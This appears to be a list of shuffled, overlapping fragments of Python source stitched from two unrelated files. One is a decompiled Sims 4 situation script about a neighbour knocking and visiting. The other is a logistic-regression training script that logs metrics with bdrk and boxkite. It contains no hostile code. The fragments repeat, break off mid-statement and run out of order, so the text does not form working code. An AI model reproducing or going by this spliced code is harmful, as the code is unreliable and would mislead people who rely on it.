"class _NeighborHangoutState(CommonSituationState): def timer_expired(self): self.owner._self_destruct() class NeighborReactToYouSituation(SituationComplexCommon): INSTANCE_TUNABLES = {'_knock_on_door_state':_KnockOnDoorState.TunableFactory(description='\\n Situation State for",
"= SituationGuestList(invite_only=True, host_sim_id=neighbor_sim_id, filter_requesting_sim_id=(active_sim_info.sim_id)) guest_list.add_guest_info(SituationGuestInfo(neighbor_sim_id, (cls._starting_neighbor_job_and_role_state.job), (RequestSpawningOption.DONT_CARE), (BouncerRequestPriority.BACKGROUND_MEDIUM), expectation_preference=True)) return guest_list @classmethod def",
"to be greeted.\\n ', locked_args={'allow_join_situation': True}), '_hangout_state':_NeighborHangoutState.TunableFactory(description='\\n Situation state for the Sim to",
"import DoubleSimResolver from interactions.utils.loot import LootActions from relationships.global_relationship_tuning import RelationshipGlobalTuning from sims4.tuning.instances import",
"def timer_expired(self): for sim_info in services.active_household(): resolver = DoubleSimResolver(sim_info, self.owner._neighbor_sim.sim_info) for loot_action in",
"requesting_sim_info=active_sim_info, allow_yielding=False, blacklist_sim_ids={sim_info.sim_id for sim_info in services.active_household()}, gsi_source_fn=(cls.get_sim_filter_gsi_name)) if not neighbors: return neighbor_sim_infos_at_home",
"Sims if this\\n situation state times out.\\n ')), 'early_exit_notification':TunableUiDialogNotificationSnippet(description='\\n Notification that will be",
"@classmethod def _get_tuned_job_and_default_role_state_tuples(cls): return [(cls._starting_neighbor_job_and_role_state.job, cls._starting_neighbor_job_and_role_state.role_state)] @classmethod def default_job(cls): pass def __init__(self, *args,",
"state times out.\\n ', tunable=LootActions.TunableReference(description='\\n A loot action applied to all of the",
"BouncerExclusivityCategory, RequestSpawningOption, BouncerRequestPriority from situations.situation import Situation from situations.situation_complex import SituationComplexCommon, TunableSituationJobAndRoleState, CommonSituationState,",
"')), 'early_exit_notification':TunableUiDialogNotificationSnippet(description='\\n Notification that will be shown when this situation state times\\n out.\\n",
"= {'_knock_on_door_state':_KnockOnDoorState.TunableFactory(description='\\n Situation State for the Sim to knock on the door.\\n ',",
"neighbor_sim_id = cls._get_neighbor() if neighbor_sim_id is None: return guest_list = SituationGuestList(invite_only=True, host_sim_id=neighbor_sim_id, filter_requesting_sim_id=(active_sim_info.sim_id))",
"timer_expired(self): self.owner._self_destruct() class NeighborReactToYouSituation(SituationComplexCommon): INSTANCE_TUNABLES = {'_knock_on_door_state':_KnockOnDoorState.TunableFactory(description='\\n Situation State for the Sim to",
"(RequestSpawningOption.DONT_CARE), (BouncerRequestPriority.BACKGROUND_MEDIUM), expectation_preference=True)) return guest_list @classmethod def _get_neighbor(cls): active_sim_info = services.active_sim_info() neighbors =",
"3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)] # Embedded",
"situations.situation_complex import SituationComplexCommon, TunableSituationJobAndRoleState, CommonSituationState, SituationStateData, CommonInteractionCompletedSituationState, SituationState from situations.situation_guest_list import SituationGuestInfo, SituationGuestList",
"interactions.utils.loot import LootActions from relationships.global_relationship_tuning import RelationshipGlobalTuning from sims4.tuning.instances import lock_instance_tunables from sims4.tuning.tunable",
"= sim.sim_info.relationship_tracker for sim_info in services.active_household(): if relationship_tracker.has_bit(sim_info.sim_id, RelationshipGlobalTuning.NEIGHBOR_GIVEN_KEY_RELATIONSHIP_BIT): self._change_state(self.owner._hangout_state()) return self._change_state(self.owner._knock_on_door_state()) class",
"= {'early_exit_loot':TunableList(description='\\n A list of loot to apply between the neighbor and the",
"cls._starting_neighbor_job_and_role_state.role_state)] @classmethod def default_job(cls): pass def __init__(self, *args, **kwargs): (super().__init__)(*args, **kwargs) self._neighbor_sim =",
"2020, 18:58:18) [MSC v.1900 64 bit (AMD64)] # Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\apartments\\situations\\neighbor_react_to_you_situation.py #",
"if result.sim_info.is_at_home] neighbor_sim_id = random.choice(neighbor_sim_infos_at_home).sim_id if neighbor_sim_infos_at_home else None return neighbor_sim_id def start_situation(self):",
"A loot action applied to all of the active household Sims if this\\n",
"between the neighbor and the active\\n household Sims if this stiuation state times",
"_NeighborWaitToBeGreetedState(CommonInteractionCompletedSituationState): FACTORY_TUNABLES = {'early_exit_loot':TunableList(description='\\n A list of loot to apply between the neighbor",
"**kwargs) self._neighbor_sim = None def _on_set_sim_job(self, sim, job_type): super()._on_set_sim_job(sim, job_type) self._neighbor_sim = sim",
"get_predefined_guest_list(cls): active_sim_info = services.active_sim_info() neighbor_sim_id = cls._get_neighbor() if neighbor_sim_id is None: return guest_list",
"import BouncerExclusivityCategory, RequestSpawningOption, BouncerRequestPriority from situations.situation import Situation from situations.situation_complex import SituationComplexCommon, TunableSituationJobAndRoleState,",
"self._change_state(self.owner._knock_on_door_state()) class _KnockOnDoorState(CommonInteractionCompletedSituationState): def _on_interaction_of_interest_complete(self, **kwargs): self._change_state(self.owner._wait_to_be_greeted()) class _NeighborWaitToBeGreetedState(CommonInteractionCompletedSituationState): FACTORY_TUNABLES = {'early_exit_loot':TunableList(description='\\n A",
"and the active\\n household Sims if this stiuation state times out.\\n ', tunable=LootActions.TunableReference(description='\\n",
"of the active household Sims if this\\n situation state times out.\\n ')), 'early_exit_notification':TunableUiDialogNotificationSnippet(description='\\n",
"', locked_args={'time_out':None, 'allow_join_situation':True}), '_wait_to_be_greeted':_NeighborWaitToBeGreetedState.TunableFactory(description='\\n Situation State for the Sim to wait to be",
"self.owner._neighbor_sim.sim_info) for loot_action in self._early_exit_loot: loot_action.apply_to_resolver(resolver) resolver = DoubleSimResolver(services.active_sim_info(), self.owner._neighbor_sim.sim_info) early_exit_notification = self._early_exit_notification((services.active_sim_info()),",
"locked_args={'time_out':None, 'allow_join_situation':True}), '_wait_to_be_greeted':_NeighborWaitToBeGreetedState.TunableFactory(description='\\n Situation State for the Sim to wait to be greeted.\\n",
"'_starting_neighbor_job_and_role_state':TunableSituationJobAndRoleState(description='\\n Job and Role State for the neighbor.\\n ')} REMOVE_INSTANCE_TUNABLES = ('_buff', 'targeted_situation',",
"name: T:\\InGame\\Gameplay\\Scripts\\Server\\apartments\\situations\\neighbor_react_to_you_situation.py # Compiled at: 2018-07-22 23:17:14 # Size of source mod 2**32:",
"self._change_state(self.owner._wait_to_be_greeted()) class _NeighborWaitToBeGreetedState(CommonInteractionCompletedSituationState): FACTORY_TUNABLES = {'early_exit_loot':TunableList(description='\\n A list of loot to apply between",
"(cls._starting_neighbor_job_and_role_state.job), (RequestSpawningOption.DONT_CARE), (BouncerRequestPriority.BACKGROUND_MEDIUM), expectation_preference=True)) return guest_list @classmethod def _get_neighbor(cls): active_sim_info = services.active_sim_info() neighbors",
"ui.ui_dialog_notification import TunableUiDialogNotificationSnippet import services class _StartSituationState(SituationState): def _on_set_sim_role_state(self, sim, *args, **kwargs): (super()._on_set_sim_role_state)(sim,",
"loot action applied to all of the active household Sims if this\\n situation",
"**kwargs): (super().__init__)(*args, **kwargs) self._neighbor_sim = None def _on_set_sim_job(self, sim, job_type): super()._on_set_sim_job(sim, job_type) self._neighbor_sim",
"SituationGuestList from situations.situation_types import SituationCreationUIOption from ui.ui_dialog_notification import TunableUiDialogNotificationSnippet import services class _StartSituationState(SituationState):",
"import SituationComplexCommon, TunableSituationJobAndRoleState, CommonSituationState, SituationStateData, CommonInteractionCompletedSituationState, SituationState from situations.situation_guest_list import SituationGuestInfo, SituationGuestList from",
"*args, **kwargs): (super().__init__)(*args, **kwargs) self._neighbor_sim = None def _on_set_sim_job(self, sim, job_type): super()._on_set_sim_job(sim, job_type)",
"Notification that will be shown when this situation state times\\n out.\\n ')} def",
"tunable=LootActions.TunableReference(description='\\n A loot action applied to all of the active household Sims if",
"= DoubleSimResolver(sim_info, self.owner._neighbor_sim.sim_info) for loot_action in self._early_exit_loot: loot_action.apply_to_resolver(resolver) resolver = DoubleSimResolver(services.active_sim_info(), self.owner._neighbor_sim.sim_info) early_exit_notification",
"import SituationGuestInfo, SituationGuestList from situations.situation_types import SituationCreationUIOption from ui.ui_dialog_notification import TunableUiDialogNotificationSnippet import services",
"_states(cls): return (SituationStateData(1, _StartSituationState), SituationStateData(2, _KnockOnDoorState, factory=(cls._knock_on_door_state)), SituationStateData(3, _NeighborWaitToBeGreetedState, factory=(cls._wait_to_be_greeted)), SituationStateData(4, _NeighborHangoutState, factory=(cls._hangout_state)))",
"random from event_testing.resolver import DoubleSimResolver from interactions.utils.loot import LootActions from relationships.global_relationship_tuning import RelationshipGlobalTuning",
"factory=(cls._knock_on_door_state)), SituationStateData(3, _NeighborWaitToBeGreetedState, factory=(cls._wait_to_be_greeted)), SituationStateData(4, _NeighborHangoutState, factory=(cls._hangout_state))) @classmethod def _get_tuned_job_and_default_role_state_tuples(cls): return [(cls._starting_neighbor_job_and_role_state.job, cls._starting_neighbor_job_and_role_state.role_state)]",
"State for the Sim to wait to be greeted.\\n ', locked_args={'allow_join_situation': True}), '_hangout_state':_NeighborHangoutState.TunableFactory(description='\\n",
"**kwargs) relationship_tracker = sim.sim_info.relationship_tracker for sim_info in services.active_household(): if relationship_tracker.has_bit(sim_info.sim_id, RelationshipGlobalTuning.NEIGHBOR_GIVEN_KEY_RELATIONSHIP_BIT): self._change_state(self.owner._hangout_state()) return",
"early_exit_notification=None, **kwargs): (super().__init__)(*args, **kwargs) self._early_exit_loot = early_exit_loot self._early_exit_notification = early_exit_notification def _on_interaction_of_interest_complete(self, **kwargs):",
"a while.\\n ', locked_args={'allow_join_situation': True}), '_starting_neighbor_job_and_role_state':TunableSituationJobAndRoleState(description='\\n Job and Role State for the neighbor.\\n",
"the neighbor and the active\\n household Sims if this stiuation state times out.\\n",
"on the door.\\n ', locked_args={'time_out':None, 'allow_join_situation':True}), '_wait_to_be_greeted':_NeighborWaitToBeGreetedState.TunableFactory(description='\\n Situation State for the Sim to",
"services.active_household(): if relationship_tracker.has_bit(sim_info.sim_id, RelationshipGlobalTuning.NEIGHBOR_GIVEN_KEY_RELATIONSHIP_BIT): self._change_state(self.owner._hangout_state()) return self._change_state(self.owner._knock_on_door_state()) class _KnockOnDoorState(CommonInteractionCompletedSituationState): def _on_interaction_of_interest_complete(self, **kwargs): self._change_state(self.owner._wait_to_be_greeted())",
"A list of loot to apply between the neighbor and the active\\n household",
"**kwargs): self._change_state(self.owner._hangout_state()) def timer_expired(self): for sim_info in services.active_household(): resolver = DoubleSimResolver(sim_info, self.owner._neighbor_sim.sim_info) for",
"while.\\n ', locked_args={'allow_join_situation': True}), '_starting_neighbor_job_and_role_state':TunableSituationJobAndRoleState(description='\\n Job and Role State for the neighbor.\\n ')}",
"Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)] #",
"out.\\n ')} def __init__(self, *args, early_exit_loot=tuple(), early_exit_notification=None, **kwargs): (super().__init__)(*args, **kwargs) self._early_exit_loot = early_exit_loot",
"return (SituationStateData(1, _StartSituationState), SituationStateData(2, _KnockOnDoorState, factory=(cls._knock_on_door_state)), SituationStateData(3, _NeighborWaitToBeGreetedState, factory=(cls._wait_to_be_greeted)), SituationStateData(4, _NeighborHangoutState, factory=(cls._hangout_state))) @classmethod",
"factory=(cls._hangout_state))) @classmethod def _get_tuned_job_and_default_role_state_tuples(cls): return [(cls._starting_neighbor_job_and_role_state.job, cls._starting_neighbor_job_and_role_state.role_state)] @classmethod def default_job(cls): pass def __init__(self,",
"guest_list = SituationGuestList(invite_only=True, host_sim_id=neighbor_sim_id, filter_requesting_sim_id=(active_sim_info.sim_id)) guest_list.add_guest_info(SituationGuestInfo(neighbor_sim_id, (cls._starting_neighbor_job_and_role_state.job), (RequestSpawningOption.DONT_CARE), (BouncerRequestPriority.BACKGROUND_MEDIUM), expectation_preference=True)) return guest_list @classmethod",
"from event_testing.resolver import DoubleSimResolver from interactions.utils.loot import LootActions from relationships.global_relationship_tuning import RelationshipGlobalTuning from",
"random.choice(neighbor_sim_infos_at_home).sim_id if neighbor_sim_infos_at_home else None return neighbor_sim_id def start_situation(self): super().start_situation() self._change_state(_StartSituationState()) lock_instance_tunables(NeighborReactToYouSituation, exclusivity=(BouncerExclusivityCategory.NORMAL),",
"def _get_neighbor(cls): active_sim_info = services.active_sim_info() neighbors = services.sim_filter_service().submit_filter((cls._starting_neighbor_job_and_role_state.job.filter), callback=None, requesting_sim_info=active_sim_info, allow_yielding=False, blacklist_sim_ids={sim_info.sim_id for",
"neighbor_sim_infos_at_home else None return neighbor_sim_id def start_situation(self): super().start_situation() self._change_state(_StartSituationState()) lock_instance_tunables(NeighborReactToYouSituation, exclusivity=(BouncerExclusivityCategory.NORMAL), creation_ui_option=(SituationCreationUIOption.NOT_AVAILABLE), duration=0,",
"if not neighbors: return neighbor_sim_infos_at_home = [result.sim_info for result in neighbors if result.sim_info.is_at_home]",
"list of loot to apply between the neighbor and the active\\n household Sims",
"allow_yielding=False, blacklist_sim_ids={sim_info.sim_id for sim_info in services.active_household()}, gsi_source_fn=(cls.get_sim_filter_gsi_name)) if not neighbors: return neighbor_sim_infos_at_home =",
"True}), '_starting_neighbor_job_and_role_state':TunableSituationJobAndRoleState(description='\\n Job and Role State for the neighbor.\\n ')} REMOVE_INSTANCE_TUNABLES = ('_buff',",
"_StartSituationState(SituationState): def _on_set_sim_role_state(self, sim, *args, **kwargs): (super()._on_set_sim_role_state)(sim, *args, **kwargs) relationship_tracker = sim.sim_info.relationship_tracker for",
"at: 2018-07-22 23:17:14 # Size of source mod 2**32: 9737 bytes import random",
"loot_action.apply_to_resolver(resolver) resolver = DoubleSimResolver(services.active_sim_info(), self.owner._neighbor_sim.sim_info) early_exit_notification = self._early_exit_notification((services.active_sim_info()), resolver=resolver) early_exit_notification.show_dialog() self.owner._self_destruct() class _NeighborHangoutState(CommonSituationState):",
"sim_info in services.active_household()}, gsi_source_fn=(cls.get_sim_filter_gsi_name)) if not neighbors: return neighbor_sim_infos_at_home = [result.sim_info for result",
"situations.situation import Situation from situations.situation_complex import SituationComplexCommon, TunableSituationJobAndRoleState, CommonSituationState, SituationStateData, CommonInteractionCompletedSituationState, SituationState from",
"sim @classmethod def get_predefined_guest_list(cls): active_sim_info = services.active_sim_info() neighbor_sim_id = cls._get_neighbor() if neighbor_sim_id is",
"self._early_exit_loot: loot_action.apply_to_resolver(resolver) resolver = DoubleSimResolver(services.active_sim_info(), self.owner._neighbor_sim.sim_info) early_exit_notification = self._early_exit_notification((services.active_sim_info()), resolver=resolver) early_exit_notification.show_dialog() self.owner._self_destruct() class",
"def _states(cls): return (SituationStateData(1, _StartSituationState), SituationStateData(2, _KnockOnDoorState, factory=(cls._knock_on_door_state)), SituationStateData(3, _NeighborWaitToBeGreetedState, factory=(cls._wait_to_be_greeted)), SituationStateData(4, _NeighborHangoutState,",
"the Sim to hang out for a while.\\n ', locked_args={'allow_join_situation': True}), '_starting_neighbor_job_and_role_state':TunableSituationJobAndRoleState(description='\\n Job"
] |
[
"main(): x_train, y_train = load_dataset( filepath=TRAIN_DATA_PATH, target='Type' ) x_test, y_test = load_dataset( filepath=TEST_DATA_PATH,",
"x_train, y_train = load_dataset( filepath=TRAIN_DATA_PATH, target='Type' ) x_test, y_test = load_dataset( filepath=TEST_DATA_PATH, target='Type'",
"can use a \"micro-average\" by # quantifying score on all classes jointly #",
"expect both features # and inference to be numeric values y_train = np.argmax(y_train_onehot,",
"variable data :type y_test_onehot: numpy.ndarray :return: Test predicted probability and predictions :rtype: tuple[numpy.ndarray,",
"df['large_rings'] = (df['Rings'] > 10).astype(int) # Ensure nothing missing original_len = len(df) df.dropna(how=\"any\",",
"= metrics.f1_score(y_test, test_pred, average='macro') roc_auc = metrics.roc_auc_score(y_test_onehot, test_prob, average='macro', multi_class='ovr') avg_prc = metrics.average_precision_score(y_test_onehot,",
":type filepath: str :param target: Target variable :type target: str :return: The features",
"and returns the features as a pandas dataframe and the target variable as",
"Pipeline, x_test: pd.core.frame.DataFrame, y_test: np.ndarray, y_test_onehot: np.ndarray): \"\"\" Computes, prints and log metrics.",
"x_test: pandas.core.frame.DataFrame :param y_test: Target variable data for testing :type y_test: numpy.ndarray :param",
"\"privileged_group_name\": \"Large\", \"unprivileged_attribute_values\": [0], # unprivileged group name corresponding to values=[0] \"unprivileged_group_name\": \"Small\",",
"import bdrk import numpy as np import pandas as pd from bdrk.model_analyzer import",
"= env.float(\"C\") CONFIG_FAI = { \"large_rings\": { \"privileged_attribute_values\": [1], # privileged group name",
"y: numpy.ndarray :param seed: `random_state` for logistic regression model :type seed: float :param",
"sklearn.preprocessing import OneHotEncoder, StandardScaler env = Env() OUTPUT_MODEL_PATH = env(\"OUTPUT_MODEL_PATH\") TRAIN_DATA_PATH = env(\"TRAIN_DATA_PATH\")",
"use the same `log_chart_data` method bdrk.log_binary_classifier_metrics( y_test_onehot.ravel().astype(int).tolist(), # list of int test_prob.ravel().astype(float).tolist() #",
"= env(\"TEST_DATA_PATH\") C = env.float(\"C\") CONFIG_FAI = { \"large_rings\": { \"privileged_attribute_values\": [1], #",
"= 0, C: float = 1, verbose: bool = False) -> Pipeline: \"\"\"",
"prints and log metrics. :param pipe: Pipeline of transforms with a trained final",
"# See https://scikit-learn.org/stable/auto_examples/model_selection/plot_precision_recall.html # noqa: E501 # This will allow us to use",
"model)]) verbose and print('Done training.') return pipe def compute_log_metrics(pipe: Pipeline, x_test: pd.core.frame.DataFrame, y_test:",
"final estimator :rtype: sklearn.pipeline.Pipeline \"\"\" verbose and print('\\nTRAIN\\nScaling...') scaling = StandardScaler() X =",
"`log_chart_data` assumes binary classification # For multiclass labels, we can use a \"micro-average\"",
"InferenceHistogramCollector ) from boxkite.monitoring.encoder import MetricEncoder from environs import Env from sklearn import",
"original_len = len(df) df.dropna(how=\"any\", axis=0, inplace=True) num_rows_dropped = original_len - len(df) if num_rows_dropped",
"as pd from bdrk.model_analyzer import ModelAnalyzer, ModelTypes from boxkite.monitoring.collector import ( BaselineMetricCollector, FeatureHistogramCollector,",
"str, target: str) -> Tuple[pd.core.frame.DataFrame, np.ndarray]: \"\"\" Loads the dataset and returns the",
"roc_auc = metrics.roc_auc_score(y_test_onehot, test_prob, average='macro', multi_class='ovr') avg_prc = metrics.average_precision_score(y_test_onehot, test_prob, average='macro') print(\"\\nEVALUATION\\n\" f\"\\tAccuracy",
"nothing missing original_len = len(df) df.dropna(how=\"any\", axis=0, inplace=True) num_rows_dropped = original_len - len(df)",
"InferenceHistogramCollector(data=train_predicted, is_discrete=True) # Specify inference as discrete ] encoder = MetricEncoder(collectors=collectors) with open(BaselineMetricCollector.DEFAULT_HISTOGRAM_PATH,",
"sklearn import metrics from sklearn.linear_model import LogisticRegression from sklearn.pipeline import Pipeline from sklearn.preprocessing",
"data :type filepath: str :param target: Target variable :type target: str :return: The",
"return df, y def train_log_reg_model(X: pd.core.frame.DataFrame, y: np.ndarray, seed: float = 0, C:",
"import OneHotEncoder, StandardScaler env = Env() OUTPUT_MODEL_PATH = env(\"OUTPUT_MODEL_PATH\") TRAIN_DATA_PATH = env(\"TRAIN_DATA_PATH\") TEST_DATA_PATH",
"data.\") y = df[target].values df.drop(target, axis=1, inplace=True) return df, y def train_log_reg_model(X: pd.core.frame.DataFrame,",
"ModelMonitoringService.export_text expect both features # and inference to be numeric values y_train =",
"and trains a logistic regression model. :param X: Features for training :type X:",
"target variable data :type y_test_onehot: numpy.ndarray :return: Test predicted probability and predictions :rtype:",
"pipe: Pipeline of transforms with a trained final estimator :type pipe: sklearn.pipeline.Pipeline :param",
":type y_test_onehot: numpy.ndarray :return: Test predicted probability and predictions :rtype: tuple[numpy.ndarray, numpy.ndarray] \"\"\"",
"return pipe def compute_log_metrics(pipe: Pipeline, x_test: pd.core.frame.DataFrame, y_test: np.ndarray, y_test_onehot: np.ndarray): \"\"\" Computes,",
"Test predicted probability and predictions :rtype: tuple[numpy.ndarray, numpy.ndarray] \"\"\" test_prob = pipe.predict_proba(x_test) test_pred",
"noqa: E501 # This will allow us to use the same `log_chart_data` method",
"for training :type X: pandas.core.frame.DataFrame :param y: Target variable :type y: numpy.ndarray :param",
"= df[target].values df.drop(target, axis=1, inplace=True) return df, y def train_log_reg_model(X: pd.core.frame.DataFrame, y: np.ndarray,",
"df[target].values df.drop(target, axis=1, inplace=True) return df, y def train_log_reg_model(X: pd.core.frame.DataFrame, y: np.ndarray, seed:",
"scaling.fit_transform(X) verbose and print('Fitting...') verbose and print('C:', C) model = LogisticRegression(random_state=seed, C=C, max_iter=4000)",
"name corresponding to values=[0] \"unprivileged_group_name\": \"Small\", } } def load_dataset(filepath: str, target: str)",
"a logistic regression model. :param X: Features for training :type X: pandas.core.frame.DataFrame :param",
"to values=[1] \"privileged_group_name\": \"Large\", \"unprivileged_attribute_values\": [0], # unprivileged group name corresponding to values=[0]",
"C=C, max_iter=4000) model.fit(X, y) verbose and print('Chaining pipeline...') pipe = Pipeline([('scaling', scaling), ('model',",
"enc.fit_transform(y_train.reshape(-1, 1)) y_test_onehot = enc.fit_transform(y_test.reshape(-1, 1)) print('\\nCATEGORIES') for value, category in enumerate(enc.categories_[0]): print(f'{category}",
"np.argmax(y_test_onehot, axis=1) pipe = train_log_reg_model(x_train, y_train, seed=0, C=C, verbose=True) # Save trained model",
"array :rtype: tuple[pandas.core.frame.DataFrame, numpy.ndarray] \"\"\" df = pd.read_csv(filepath) df['large_rings'] = (df['Rings'] > 10).astype(int)",
":param x_test: Features for testing :type x_test: pandas.core.frame.DataFrame :param y_test: Target variable data",
"{roc_auc:.4f}\\n\" f\"\\tAverage precision (macro) = {avg_prc:.4f}\") # Bedrock Logger: captures model metrics bdrk.log_metrics(",
"(macro)\": roc_auc, \"Avg precision (macro)\": avg_prc, } ) # `log_chart_data` assumes binary classification",
"= compute_log_metrics(pipe, x_test, y_test, y_test_onehot) # Save feature and inferance distribution train_predicted =",
"Features for testing :type x_test: pandas.core.frame.DataFrame :param y_test: Target variable data for testing",
"trained final estimator :rtype: sklearn.pipeline.Pipeline \"\"\" verbose and print('\\nTRAIN\\nScaling...') scaling = StandardScaler() X",
"which column indices are discrete ), InferenceHistogramCollector(data=train_predicted, is_discrete=True) # Specify inference as discrete",
"import Pipeline from sklearn.preprocessing import OneHotEncoder, StandardScaler env = Env() OUTPUT_MODEL_PATH = env(\"OUTPUT_MODEL_PATH\")",
"model.') test_prob, test_pred = compute_log_metrics(pipe, x_test, y_test, y_test_onehot) # Save feature and inferance",
"(macro)\": avg_prc, } ) # `log_chart_data` assumes binary classification # For multiclass labels,",
"target: str :return: The features pandas dataframe and the target numpy array :rtype:",
"to values=[0] \"unprivileged_group_name\": \"Small\", } } def load_dataset(filepath: str, target: str) -> Tuple[pd.core.frame.DataFrame,",
"verbose and print('C:', C) model = LogisticRegression(random_state=seed, C=C, max_iter=4000) model.fit(X, y) verbose and",
"if num_rows_dropped > 0: print(f\"Warning - dropped {num_rows_dropped} rows with NA data.\") y",
"import ( BaselineMetricCollector, FeatureHistogramCollector, InferenceHistogramCollector ) from boxkite.monitoring.encoder import MetricEncoder from environs import",
"pipe], OUTPUT_MODEL_PATH) print('\\nSaved trained one hot encoder and logistic regression model.') test_prob, test_pred",
"{recall:.4f}\\n\" f\"\\tF1 score (macro) = {f1_score:.4f}\\n\" f\"\\tROC AUC (macro) = {roc_auc:.4f}\\n\" f\"\\tAverage precision",
"= {precision:.4f}\\n\" f\"\\tRecall (macro) = {recall:.4f}\\n\" f\"\\tF1 score (macro) = {f1_score:.4f}\\n\" f\"\\tROC AUC",
"numpy as np import pandas as pd from bdrk.model_analyzer import ModelAnalyzer, ModelTypes from",
"test_prob, test_pred def main(): x_train, y_train = load_dataset( filepath=TRAIN_DATA_PATH, target='Type' ) x_test, y_test",
"values y_train = np.argmax(y_train_onehot, axis=1) y_test = np.argmax(y_test_onehot, axis=1) pipe = train_log_reg_model(x_train, y_train,",
"(macro) = {f1_score:.4f}\\n\" f\"\\tROC AUC (macro) = {roc_auc:.4f}\\n\" f\"\\tAverage precision (macro) = {avg_prc:.4f}\")",
"y: np.ndarray, seed: float = 0, C: float = 1, verbose: bool =",
"sklearn.pipeline.Pipeline :param x_test: Features for testing :type x_test: pandas.core.frame.DataFrame :param y_test: Target variable",
"0: print(f\"Warning - dropped {num_rows_dropped} rows with NA data.\") y = df[target].values df.drop(target,",
"(macro)\": recall, \"F1 Score (macro)\": f1_score, \"ROC AUC (macro)\": roc_auc, \"Avg precision (macro)\":",
"test_pred def main(): x_train, y_train = load_dataset( filepath=TRAIN_DATA_PATH, target='Type' ) x_test, y_test =",
"np.argmax(y_train_onehot, axis=1) y_test = np.argmax(y_test_onehot, axis=1) pipe = train_log_reg_model(x_train, y_train, seed=0, C=C, verbose=True)",
":type X: pandas.core.frame.DataFrame :param y: Target variable :type y: numpy.ndarray :param seed: `random_state`",
"= env(\"OUTPUT_MODEL_PATH\") TRAIN_DATA_PATH = env(\"TRAIN_DATA_PATH\") TEST_DATA_PATH = env(\"TEST_DATA_PATH\") C = env.float(\"C\") CONFIG_FAI =",
"numpy.ndarray :return: Test predicted probability and predictions :rtype: tuple[numpy.ndarray, numpy.ndarray] \"\"\" test_prob =",
"trained model feature_names = x_train.columns.tolist() print(\"\\nSAMPLE FEATURES\") print({ feature_name: str(x_train[feature_name][0]) for feature_name in",
"= Env() OUTPUT_MODEL_PATH = env(\"OUTPUT_MODEL_PATH\") TRAIN_DATA_PATH = env(\"TRAIN_DATA_PATH\") TEST_DATA_PATH = env(\"TEST_DATA_PATH\") C =",
"model = LogisticRegression(random_state=seed, C=C, max_iter=4000) model.fit(X, y) verbose and print('Chaining pipeline...') pipe =",
"enumerate(enc.categories_[0]): print(f'{category} : {value}') # Convert target variable to numeric values # ModelMonitoringService.export_text",
"metrics.accuracy_score(y_test, test_pred) precision = metrics.precision_score(y_test, test_pred, average='macro') recall = metrics.recall_score(y_test, test_pred, average='macro') f1_score",
":rtype: tuple[numpy.ndarray, numpy.ndarray] \"\"\" test_prob = pipe.predict_proba(x_test) test_pred = pipe.predict(x_test) acc = metrics.accuracy_score(y_test,",
"np.ndarray]: \"\"\" Loads the dataset and returns the features as a pandas dataframe",
"metrics.average_precision_score(y_test_onehot, test_prob, average='macro') print(\"\\nEVALUATION\\n\" f\"\\tAccuracy = {acc:.4f}\\n\" f\"\\tPrecision (macro) = {precision:.4f}\\n\" f\"\\tRecall (macro)",
"pipeline...') pipe = Pipeline([('scaling', scaling), ('model', model)]) verbose and print('Done training.') return pipe",
"AUC (macro)\": roc_auc, \"Avg precision (macro)\": avg_prc, } ) # `log_chart_data` assumes binary",
"one hot encoder and logistic regression model.') test_prob, test_pred = compute_log_metrics(pipe, x_test, y_test,",
"# quantifying score on all classes jointly # See https://scikit-learn.org/stable/auto_examples/model_selection/plot_precision_recall.html # noqa: E501",
"LogisticRegression(random_state=seed, C=C, max_iter=4000) model.fit(X, y) verbose and print('Chaining pipeline...') pipe = Pipeline([('scaling', scaling),",
":param pipe: Pipeline of transforms with a trained final estimator :type pipe: sklearn.pipeline.Pipeline",
"y: Target variable :type y: numpy.ndarray :param seed: `random_state` for logistic regression model",
"shape (n_samples, n_classes) enc = OneHotEncoder(handle_unknown='ignore', sparse=False) y_train_onehot = enc.fit_transform(y_train.reshape(-1, 1)) y_test_onehot =",
"pipe = train_log_reg_model(x_train, y_train, seed=0, C=C, verbose=True) # Save trained model feature_names =",
"as discrete ] encoder = MetricEncoder(collectors=collectors) with open(BaselineMetricCollector.DEFAULT_HISTOGRAM_PATH, \"wb\") as f: f.write(encoder.as_text()) print('Saved",
"from typing import Tuple import bdrk import numpy as np import pandas as",
"\"wb\") as f: f.write(encoder.as_text()) print('Saved feature and inference distribution.') # Train Shap model",
"features pandas dataframe and the target numpy array :rtype: tuple[pandas.core.frame.DataFrame, numpy.ndarray] \"\"\" df",
"estimator :rtype: sklearn.pipeline.Pipeline \"\"\" verbose and print('\\nTRAIN\\nScaling...') scaling = StandardScaler() X = scaling.fit_transform(X)",
"(macro) = {avg_prc:.4f}\") # Bedrock Logger: captures model metrics bdrk.log_metrics( { \"Accuracy\": acc,",
"{ \"Accuracy\": acc, \"Precision (macro)\": precision, \"Recall (macro)\": recall, \"F1 Score (macro)\": f1_score,",
"\"\"\" Computes, prints and log metrics. :param pipe: Pipeline of transforms with a",
"target='Type' ) print('X (train)') print(x_train) # sklearn `roc_auc_score` and `average_precision_score` expects # binary",
"sklearn.pipeline import Pipeline from sklearn.preprocessing import OneHotEncoder, StandardScaler env = Env() OUTPUT_MODEL_PATH =",
"Tuple import bdrk import numpy as np import pandas as pd from bdrk.model_analyzer",
"features as a pandas dataframe and the target variable as a numpy array.",
"features # and inference to be numeric values y_train = np.argmax(y_train_onehot, axis=1) y_test",
"`average_precision_score` expects # binary label indicators with shape (n_samples, n_classes) enc = OneHotEncoder(handle_unknown='ignore',",
"} def load_dataset(filepath: str, target: str) -> Tuple[pd.core.frame.DataFrame, np.ndarray]: \"\"\" Loads the dataset",
"\"\"\" verbose and print('\\nTRAIN\\nScaling...') scaling = StandardScaler() X = scaling.fit_transform(X) verbose and print('Fitting...')",
"missing original_len = len(df) df.dropna(how=\"any\", axis=0, inplace=True) num_rows_dropped = original_len - len(df) if",
"Loads the dataset and returns the features as a pandas dataframe and the",
"and inference to be numeric values y_train = np.argmax(y_train_onehot, axis=1) y_test = np.argmax(y_test_onehot,",
"# sklearn `roc_auc_score` and `average_precision_score` expects # binary label indicators with shape (n_samples,",
"test_pred, average='macro') f1_score = metrics.f1_score(y_test, test_pred, average='macro') roc_auc = metrics.roc_auc_score(y_test_onehot, test_prob, average='macro', multi_class='ovr')",
